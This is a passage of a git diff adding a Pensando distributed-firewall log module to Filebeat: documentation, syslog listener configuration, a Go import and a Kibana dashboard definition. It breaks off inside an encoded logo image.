zosN0-P9UCs&e0iatF{s+c3TEFs|D}f*2V=EgLVbQw_D&&$^hfP8PUrY4$swTH$7C^ zAUrbmEB=DcC@ss)YG?2+f%H-nm7#vg$>kmXoA<&>cc}*U_MW22rfFB53G_sz{>x+w zO1gg0Z%$x-_G?dV=QxEAnF7kPBtN>7a6ILtu;7|yx0Ovydc8g-=uN?8E^5ODki`YahqRl350`V)PZlpar(rF?23eD*J-C zALdtgy4(f9wLOczqJ+i6?FVpOzn+a{FzaeIXr1+vGVB1;|D^N|;jV1I;lSF)_pafqwFb6Q|;A6j4-v_UDx>3yNzb2l$56c9UrC}v_#zC;9B zZk0@xu+Ax0k(~Q^A7~19opClBbpz$lxfj!>$mTBh49|IBm#f14se7mYgpx1I>o-?_U>a)Nlw@=w7i z19AefUl9bL5O>+o7Fs*~lWvPsEhUJC{A|CJTjplu`dpniwYrXDIHplhl@FeFJg~8L z_w!1kAkFOn66;r?O|oF#wd@hr7E8m@rKek9o8C7 zY!yuH`B^m1e4kn}^1c#fHm`!Uo~WkZ5Q8pF&^Irz2SfiCu{HCatG zW=@u#rLr7wF3b5M<#$%gLJCT8iU8EUjtbA@*|@wA{h*03_=5@io4(nXADE=Z4E;BG z6TkMxNZekf3VPZhV9A-PiP#p=nu``XMOupEb{Je3-Phh_)`W03QIp9)%8N-K91%!@v6e#iSptg`DHfl@2ln@q+qsC8&q{d( zmOQ~TKQ{mZ=8=j;svqbRb~nVW`Cn5@(4_Tpdkv{3=qLg~(<3w4eJ4^uJK?K)PnMbL z{0_jh8EPb9RWUBMPcPMH&;nK;=%)Vq^=KZbz;AJ92&2fgL zhkZbz#3UR-L+%&5zy8eQRe!QP+op7?WK2QV8V&x1K8#%AViS*C^56vpdje{~T z7qe3DbeYN{W4>& z1`M0~5@hU_aO2O3dz(fYb%sDR%&O&Z_Z|Ty(T8JU^P&Yu`(hJhA)2=<0Kw&CJFte! zD%@C~(wp}4n)2^3{1&K8S^w`QbZ1oIur0@s<;8wyL!U-9p1=7iO9yaT;t|rTa!{R+&Zx z9UT(o9k*c_d^oKxqbpAuq%N8$@jIs`zSem~9>I;KIeYSpLD>@GQRjoS+ojf6==2xU zqiUq7Pnnu$fUYO?D`NDx7rb7#At+T!Y_UQ%>FP>%;)WTQpmwBcJZ-1!+neqD6dz(g zoFwPrk+$=kVP~Cw4S;0fYX)GtGgIq4rMEZF>Os6@hoM@sF(R(B-`cZ!H=Ry+^q~{6 z(v@0g4RtA61Np)CwZ6#hqWinGzgW~s+SM{ZN0cakUCGdc&=QXLL1#2NNB}+ z44%3up6o^YP}lJeQiaJ}@zm=h8HWNcH>=hHSGgR(H-29G7wqU9f97`R>mLo~EJuk5cF_l2jdeNgTe&Eu23;-2}>?e|{p@O#ffrxO;%BtQp{l zkPM$VX!J>uWGIhhe*Av?@mt!gtG7-*Dv5cds!l7(74ktNM(56%)SKtL&f$7*w#=(O zkhfx)th;@}&*zpeW9=6PZl8wxFW}MoQ#(Bg9;t2Z`3qgC-5)3k417f$KO_V?^iO;K zZU=$zbaEzxj#4HZI$C`YvuM<2g3T06Nl$LUV$Q>XrAxMbDKK| zE2j9%UyP%itO)82m^U6!N*MGfG1}l$dDfbN(R${!iT>jJ2yR2|`C`Hv?DH<~3?(;V zy}CHUsi6ZWEHWcb`m*l1mnUI^sbQn|_!)gfQl5_s^CfdzySTzGzj=Xx+=>)6wKB4P zq1tod*w91`w1^aC{o^=%vIzdB)48Om2Bwi4pzG)c+iVKjnA9v=ZjBMcRs8~o%K5*p zB9e#!!#9jc1)(Jr#nn&D0o9>wVUUf&twrB@KswpUVHZZ1`}Ifb`5dk>9X_kjWI0n7vv^Vcj@^giAsVm=NXEAYLUykD}MOrmAq{dKfC*E^u zh=6#AN#%}CQ}3w#SaUZ)Q;MW-kWGC31X?3o%&i#VsL|GiVC2(^*>;pSS{Xqa94K%W zmwg=TsohPvQ0&xBH|2#{j~lVL)T!aAs%-6;V|SqHxL@>9UpQ+k*!2j-SJ{6(!y3sl zN&6?iY-Xyz!h^;=ko*VM+!44Lgv}G5Jo6d#1e|iUFvBD^G8a=*^M)<@shdZCgYS<3 zL}%Z&r|$Gqx9x2z@#znHw~3_WlokAxJ;5jRrASk2$FnvMeF(yW=sK}gb_Qq5G(+HW zYD2a=5}=k56yBZhKXY-th?s9j-jXaoFX7yg$00CwqSSdNMwz{}14>#no8%Jh4@t@9t9( zt~Uj?rt9TSSGEiWC5$?wm^WUg7u`V57X5f{uyViP=|I&Fr3HV6UM;wfCDDz`*mB7@ zVqnD=SGYZjL6$kjR^gm}&d@hhE@D&xk$|b-g}nOq2}s)6)DSvM!RKBqZZoAXjN!=& zs!T~)znh+<@8z!1V@=KXJ?ub0mlnVEBacJKUST-8IMFkqulJkxR-afk*bl8<{n;qI zze5j3`vXc|l$C$h`T)&pzZO=-1JBbC#Q{9CW_KXVV!J{@kfz*ahVpWl+ZyUeq+vtS z(vCE$KmUhgt!1}ol2=52!AmBsfuffp>~sVZFPjQ|2{TbN8bjY8P8c$;M8gSa8!Eyv z3iq$7o0;)32~}$O{;*k_R7e=l=)~toSd0bvq zDS$Bw65A2leW_6HP_(sI4)*c-8-L&B9ZC$wBW1n8a*lX}pxc^k${Gkz)tu&u#*u87>LdfbN@_ckiOWV!9*&1j?0s6q|ZXSxT zvRr4NHs930_Cc?9sbFu)Q+uwmEQj)17I}rA`Fn+9_G@7erh_ySwD_1EW#%VVPfa?P zaF1Yk);;>});q$2z2*W6+XH-`-cTLX(pzCHKv`GumksZ5oQkG#A&&N|71EIQj8aSB zu6xVBr*oe~vDzsr}8KwqPPs4;&s=F8>(?V%xHJwLSFCO4dI|BSmI$QXKG) z4wR^+O0D;<*}?sYN^M=1N|=7*wIKbS2v4u;+IvIN*YnMrj5s*7&gv|!Yl%mQ+q*8E zGK)awNZ!?dh9IX|ETI@JEUW1o$*(i+npqC0%g+N;v8q0&}cP};R23CUlE z;tQ_w6y^<&Ol}Hm;En8Jvhliw9|pu81653 zh6%kAyZqK*LKB5HGm(WsyRj1w@LGKCn=`q3e8N$j1Y_Jp$2G3%f$=&m2I?SVBysG4 zk+awGL-7^k%7|q*L&C@5c+zd0_5z85B34YTC1$x`GjsXm-sX&~U!~>xla{F^LO@<1 zU%5A0)7fyyPP)QQNlcJGd%J;dihl7P$$8&&)1WN27IyBE`O;6@5qAs21JJnr(nb5{ z+`eIB;EN*;_U8XKTlqeD5F%dmoAsEgbJd!WVL@OUdwr#qrL7yjTdk6YVl}&OMVeM) zAis2Tq4|N9Gxg3yVz0}h|CIxczD2_&Alvl`eDWjU20%VXnb)K&z`^;|$Z^#?%ShS6 z2nC=btAl^{f6|=$lYf2DjQmS~Wg6s9r;v*E bnxz>mjd{j3izJU;DHI+*dzAm+x$l1gg{SJL literal 0 HcmV?d00001 diff --git a/filebeat/docs/modules/pensando.asciidoc b/filebeat/docs/modules/pensando.asciidoc new file mode 100644 index 000000000000..88c2924a8f10 --- /dev/null +++ b/filebeat/docs/modules/pensando.asciidoc @@ -0,0 +1,69 @@ +//// +This file is generated! See scripts/docs_collector.py +//// + +[[filebeat-module-pensando]] +:modulename: pensando +:has-dashboards: true + +== pensando module + +The +{modulename}+ module parses distributed firewall logs created by the +http://pensando.io/[Pensando] distributed services card (DSC). + + +include::../include/what-happens.asciidoc[] + +include::../include/gs-link.asciidoc[] + +[float] +=== Compatibility + +The Pensando module has been tested with 1.12.0-E-54 and later. + +include::../include/configuring-intro.asciidoc[] +The following example shows how to set parameters in the +modules.d/{modulename}.yml+ +file to listen for firewall logs sent from the Pensando DSC(s) on port 5514 (default is 9001): + +["source","yaml",subs="attributes"] +----- +- module: pensando + access: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: [9001] +----- +:fileset_ex: dfw + +include::../include/config-option-intro.asciidoc[] + +TODO: document the variables from each fileset. If you're describing a variable +that's common to other modules, you can reuse shared descriptions by including +the relevant file. For example: + +[float] +==== `dfw` log fileset settings + +include::../include/var-paths.asciidoc[] + +[float] +=== Example dashboard + +This module comes with a sample dashboard. For example: + +[role="screenshot"] +image::./images/filebeat-pensando-dfw.png[] + +:has-dashboards!: + +:fileset_ex!: + +:modulename!: + + +[float] +=== Fields + +For a description of each field in the module, see the +<> section. + diff --git a/filebeat/docs/modules_list.asciidoc b/filebeat/docs/modules_list.asciidoc index 1a3da8bca3d7..aec43cb354e2 100644 --- a/filebeat/docs/modules_list.asciidoc +++ b/filebeat/docs/modules_list.asciidoc @@ -50,6 +50,7 @@ This file is generated! See scripts/docs_collector.py * <> * <> * <> + * <> * <> * <> * <> @@ -121,6 +122,7 @@ include::modules/okta.asciidoc[] include::modules/oracle.asciidoc[] include::modules/osquery.asciidoc[] include::modules/panw.asciidoc[] +include::modules/pensando.asciidoc[] include::modules/postgresql.asciidoc[] include::modules/proofpoint.asciidoc[] include::modules/rabbitmq.asciidoc[] diff --git a/filebeat/filebeat.reference.yml b/filebeat/filebeat.reference.yml index 2a5533bb6363..e232640ffd0c 100644 --- a/filebeat/filebeat.reference.yml +++ b/filebeat/filebeat.reference.yml @@ -335,6 +335,18 @@ filebeat.modules: # of the document. The default is true. #var.use_namespace: true +#------------------------------- Pensando Module ------------------------------- +- module: pensando +# Firewall logs + dfw: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: 9001 + + # Set custom paths for the log files. If left empty, + # Filebeat will choose the paths depending on your OS. + # var.paths: + #------------------------------ PostgreSQL Module ------------------------------ #- module: postgresql # Logs diff --git a/filebeat/include/list.go b/filebeat/include/list.go index 519d0e715819..e4c1396d973b 100644 --- a/filebeat/include/list.go +++ b/filebeat/include/list.go @@ -45,6 +45,7 @@ import ( _ "github.com/elastic/beats/v7/filebeat/module/nats" _ "github.com/elastic/beats/v7/filebeat/module/nginx" _ "github.com/elastic/beats/v7/filebeat/module/osquery" + _ "github.com/elastic/beats/v7/filebeat/module/pensando" _ "github.com/elastic/beats/v7/filebeat/module/postgresql" _ "github.com/elastic/beats/v7/filebeat/module/redis" _ "github.com/elastic/beats/v7/filebeat/module/santa" diff --git a/filebeat/module/pensando/_meta/config.yml b/filebeat/module/pensando/_meta/config.yml new file mode 100644 index 000000000000..e632160bdd77 --- /dev/null +++ b/filebeat/module/pensando/_meta/config.yml @@ -0,0 +1,10 @@ +- module: pensando +# Firewall logs + dfw: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: 9001 + + # Set custom paths for the log files. If left empty, + # Filebeat will choose the paths depending on your OS. + # var.paths: diff --git a/filebeat/module/pensando/_meta/docs.asciidoc b/filebeat/module/pensando/_meta/docs.asciidoc new file mode 100644 index 000000000000..611ccdf01ca2 --- /dev/null +++ b/filebeat/module/pensando/_meta/docs.asciidoc @@ -0,0 +1,56 @@ +:modulename: pensando +:has-dashboards: true + +== pensando module + +The +{modulename}+ module parses distributed firewall logs created by the +http://pensando.io/[Pensando] distributed services card (DSC). + + +include::../include/what-happens.asciidoc[] + +include::../include/gs-link.asciidoc[] + +[float] +=== Compatibility + +The Pensando module has been tested with 1.12.0-E-54 and later. + +include::../include/configuring-intro.asciidoc[] +The following example shows how to set parameters in the +modules.d/{modulename}.yml+ +file to listen for firewall logs sent from the Pensando DSC(s) on port 5514 (default is 9001): + +["source","yaml",subs="attributes"] +----- +- module: pensando + access: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: [9001] +----- +:fileset_ex: dfw + +include::../include/config-option-intro.asciidoc[] + +TODO: document the variables from each fileset. If you're describing a variable +that's common to other modules, you can reuse shared descriptions by including +the relevant file. For example: + +[float] +==== `dfw` log fileset settings + +include::../include/var-paths.asciidoc[] + +[float] +=== Example dashboard + +This module comes with a sample dashboard. For example: + +[role="screenshot"] +image::./images/filebeat-pensando-dfw.png[] + +:has-dashboards!: + +:fileset_ex!: + +:modulename!: diff --git a/filebeat/module/pensando/_meta/fields.yml b/filebeat/module/pensando/_meta/fields.yml new file mode 100644 index 000000000000..f4dba1a22bab --- /dev/null +++ b/filebeat/module/pensando/_meta/fields.yml @@ -0,0 +1,10 @@ +- key: pensando + title: Pensando + description: > + pensando Module + fields: + - name: pensando + type: group + description: > + Fields from Pensando logs. + fields: diff --git a/filebeat/module/pensando/_meta/kibana/7/dashboard/pensando-dfw-overview.json b/filebeat/module/pensando/_meta/kibana/7/dashboard/pensando-dfw-overview.json new file mode 100644 index 000000000000..33ebc169841b --- /dev/null +++ b/filebeat/module/pensando/_meta/kibana/7/dashboard/pensando-dfw-overview.json @@ -0,0 +1,1341 @@ +{ + "objects": [ + { + "attributes": { + "description": "Overview of events coming from Pensando DSC distributed firewall system.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": false + }, + "panelsJSON": [ + { + "embeddableConfig": { + "title": "" + }, + "gridData": { + "h": 5, + "i": "85119076-2756-4415-8917-14c9d46732a5", + "w": 41, + "x": 0, + "y": 0 + }, + "panelIndex": "85119076-2756-4415-8917-14c9d46732a5", + "panelRefName": "panel_0", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "" + }, + "gridData": { + "h": 5, + "i": "9215c2be-bca5-4b21-8042-0e0be99e38c0", + "w": 7, + "x": 41, + "y": 0 + }, + "panelIndex": "9215c2be-bca5-4b21-8042-0e0be99e38c0", + "panelRefName": "panel_1", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "Active Workloads" + }, + "gridData": { + "h": 9, + "i": "81013c87-76c2-4ff0-9545-1295babad06e", + "w": 8, + "x": 0, + "y": 5 + }, + "panelIndex": "81013c87-76c2-4ff0-9545-1295babad06e", + "panelRefName": "panel_2", + "title": "Active Workloads", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "DFW Allowed Count" + }, + "gridData": { + "h": 9, + "i": "3ee01275-08dd-4d3f-9834-d844f5550365", + "w": 8, + "x": 8, + "y": 5 + }, + "panelIndex": "3ee01275-08dd-4d3f-9834-d844f5550365", + "panelRefName": "panel_3", + "title": "DFW Allowed Count", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "DFW Denied Count" + }, + "gridData": { + "h": 9, + "i": "9628e969-1f18-4659-a8d9-e9409f11f3a9", + "w": 8, + "x": 16, + "y": 5 + }, + "panelIndex": "9628e969-1f18-4659-a8d9-e9409f11f3a9", + "panelRefName": "panel_4", + "title": "DFW Denied Count", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "Denied Destination IPs" + }, + "gridData": { + "h": 11, + "i": "37787af1-b5ef-467e-8c5e-b0dfba56c9f9", + "w": 24, + "x": 24, + "y": 5 + }, + "panelIndex": "37787af1-b5ef-467e-8c5e-b0dfba56c9f9", + "panelRefName": "panel_5", + "title": "Denied Destination IPs", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "Traffic by Workload" + }, + "gridData": { + "h": 14, + "i": "efafcbff-a163-4475-8d12-59f716e5a3ef", + "w": 12, + "x": 0, + "y": 14 + }, + "panelIndex": "efafcbff-a163-4475-8d12-59f716e5a3ef", + "panelRefName": "panel_6", + "title": "Traffic by Workload", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "title": "Client to Server FW Action" + }, + "gridData": { + "h": 14, + "i": "52506949-eb15-4b23-b50c-2e5083df5e0f", + "w": 12, + "x": 12, + "y": 14 + }, + "panelIndex": "52506949-eb15-4b23-b50c-2e5083df5e0f", + "panelRefName": "panel_7", + "title": "Client to Server FW Action", + "version": "7.8.0" + }, + { + "embeddableConfig": {}, + "gridData": { + "h": 13, + "i": "077406bd-aa47-4dc9-b1f6-04cae0ae34b6", + "w": 24, + "x": 24, + "y": 16 + }, + "panelIndex": "077406bd-aa47-4dc9-b1f6-04cae0ae34b6", + "panelRefName": "panel_8", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "vis": { + "legendOpen": false + } + }, + "gridData": { + "h": 14, + "i": "58e763b7-a23a-480a-a984-24dd115aba2c", + "w": 12, + "x": 0, + "y": 28 + }, + "panelIndex": "58e763b7-a23a-480a-a984-24dd115aba2c", + "panelRefName": "panel_9", + "version": "7.8.0" + }, + { + "embeddableConfig": { + "table": null, + "title": "Dest Port by DSC", + "vis": { + "legendOpen": false + } + }, + "gridData": { + "h": 14, + "i": "36fc48c8-0044-4af6-a8b2-da8023806f32", + "w": 12, + "x": 12, + "y": 28 + }, + "panelIndex": "36fc48c8-0044-4af6-a8b2-da8023806f32", + "panelRefName": "panel_10", + "title": "Dest Port by DSC", + "version": "7.8.0" + }, + { + "embeddableConfig": {}, + "gridData": { + "h": 13, + "i": "a1d34501-4d64-4213-b192-1b4ca2d88793", + "w": 24, + "x": 24, + "y": 29 + }, + "panelIndex": "a1d34501-4d64-4213-b192-1b4ca2d88793", + "panelRefName": "panel_11", + "version": "7.8.0" + } + ], + "timeRestore": false, + "title": "[Filebeat Pensando] DFW Overview", + "version": 1 + }, + "id": "2713ee40-f3b1-11ea-ba07-c1efedbf0bf9", + "migrationVersion": { + "dashboard": "7.3.0" + }, + "references": [ + { + "id": "a73c8dc0-cc8d-11ea-918e-c778f7abe5d7", + "name": "panel_0", + "type": "visualization" + }, + { + "id": "39e26d70-cc4d-11ea-918e-c778f7abe5d7", + "name": "panel_1", + "type": "visualization" + }, + { + "id": "bc6a36b0-cdba-11ea-a0ef-8f5241e594be", + "name": "panel_2", + "type": "visualization" + }, + { + "id": "fa745d10-cc88-11ea-918e-c778f7abe5d7", + "name": "panel_3", + "type": "visualization" + }, + { + "id": "1d2d5f00-cc89-11ea-918e-c778f7abe5d7", + "name": "panel_4", + "type": "visualization" + }, + { + "id": "bf9d4650-cc8a-11ea-918e-c778f7abe5d7", + "name": "panel_5", + "type": "visualization" + }, + { + "id": "07983660-cd38-11ea-a0ef-8f5241e594be", + "name": "panel_6", + "type": "visualization" + }, + { + "id": "fd2202d0-cc86-11ea-918e-c778f7abe5d7", + "name": "panel_7", + "type": "visualization" + }, + { + "id": "2aa5d850-cc85-11ea-918e-c778f7abe5d7", + "name": "panel_8", + "type": "visualization" + }, + { + "id": "b8bfd3e0-e8b7-11ea-ba07-c1efedbf0bf9", + "name": "panel_9", + "type": "visualization" + }, + { + "id": "c6188140-cdb9-11ea-a0ef-8f5241e594be", + "name": "panel_10", + "type": "visualization" + }, + { + "id": "0583e120-cc8f-11ea-918e-c778f7abe5d7", + "name": "panel_11", + "type": "visualization" + } + ], + "type": "dashboard", + "updated_at": "2020-09-10T22:32:33.177Z", + "version": "WzI1NjMsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Client/Server - input list [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [], + "params": { + "controls": [ + { + "fieldName": "client.ip", + "id": "1595471403191", + "indexPatternRefName": "control_0_index_pattern", + "label": "Client", + "options": { + "dynamicOptions": true, + "multiselect": false, + "order": "desc", + "size": 500, + "type": "terms" + }, + "parent": "", + "type": "list" + }, + { + "fieldName": "server.ip", + "id": "1595471807689", + "indexPatternRefName": "control_1_index_pattern", + "label": "Server", + "options": { + "dynamicOptions": true, + "multiselect": false, + "order": "desc", + "size": 500, + "type": "terms" + }, + "parent": "", + "type": "list" + }, + { + "fieldName": "log.source.address", + "id": "1595471848091", + "indexPatternRefName": "control_2_index_pattern", + "label": "DSC", + "options": { + "dynamicOptions": false, + "multiselect": false, + "order": "desc", + "size": 500, + "type": "terms" + }, + "parent": "", + "type": "list" + } + ], + "pinFilters": true, + "updateFiltersOnChange": true, + "useTimeFilter": true + }, + "title": "Client/Server - input list [Filebeat Pensando]", + "type": "input_control_vis" + } + }, + "id": "a73c8dc0-cc8d-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "control_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "filebeat-*", + "name": "control_1_index_pattern", + "type": "index-pattern" + }, + { + "id": "filebeat-*", + "name": "control_2_index_pattern", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:58:28.390Z", + "version": "WzI0OTMsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": { + "match_all": {} + } + } + } + }, + "title": "Logo [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [], + "params": { + "fontSize": 8, + "markdown": "[![Pensando](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASAAAABJCAYAAACdD/umAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAF42lUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS42LWMxNDggNzkuMTY0MDM2LCAyMDE5LzA4LzEzLTAxOjA2OjU3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6cGhvdG9zaG9wPSJodHRwOi8vbnMuYWRvYmUuY29tL3Bob3Rvc2hvcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RFdnQ9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZUV2ZW50IyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMCAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIwLTA3LTIyVDE0OjQ3OjMwLTA2OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMC0wNy0yMlQxNDo0OToyMi0wNjowMCIgeG1wOk1ldGFkYXRhRGF0ZT0iMjAyMC0wNy0yMlQxNDo0OToyMi0wNjowMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHBob3Rvc2hvcDpDb2xvck1vZGU9IjMiIHBob3Rvc2hvcDpJQ0NQcm9maWxlPSJzUkdCIElFQzYxOTY2LTIuMSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDpkMTUyMWZhMi0wZjgzLWMzNDItYmQzZC03ZGVkYmRiNThmNjQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6ZTc4NjkzZWMtOGViNC03NTRlLWFiMzgtMTZmMGY3ZDRhNzg1IiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6ZTc4NjkzZWMtOGViNC03NTRlLWFiMzgtMTZmMGY3ZDRhNzg1Ij4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY3JlYXRlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDplNzg2OTNlYy04ZWI0LTc1NGUtYWIzOC0xNmYwZjdkNGE3ODUiIHN0RXZ0OndoZW49IjIwMjAtMDctMjJUMTQ6NDc6MzAtMDY6MDAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4wIChXaW5kb3dzKSIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6ZDE1MjFmYTItMGY4My1jMzQyLWJkM2QtN2RlZGJkYjU4ZjY0IiBzdEV2dDp3aGVuPSIyMDIwLTA3LTIyVDE0OjQ5OjIyLTA2OjAwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgMjEuMCAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPC9yZGY6U2VxPiA8L3htcE1NOkhpc3Rvcnk+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+LBGpEgAAMvVJREFUeJztvXecXkd97/+eOe3p27sk27Il27KQbVkGG7Ax2DRjMK70EmpCICSEy025N8ANhOAE8ruFFLi5JBSDCxjiggXYuADuNm5qlmWtyq6216efM/P7Y85TdvfZ1e5qJRnyfF6vZ8tzzpQzZ+Y73z5i11PPQi5H8amnzszfeecVemIiKlzXp4466qhjpaC10Pm8bZ911j7v4kv+j1zVw7qXbMAWnocaGyPYtu0KcrlrhGVFgOB497eOOur4nYIQtm2pgwf7gj17HrJOXvsIgO0/9dSm4pNPXZ7feudn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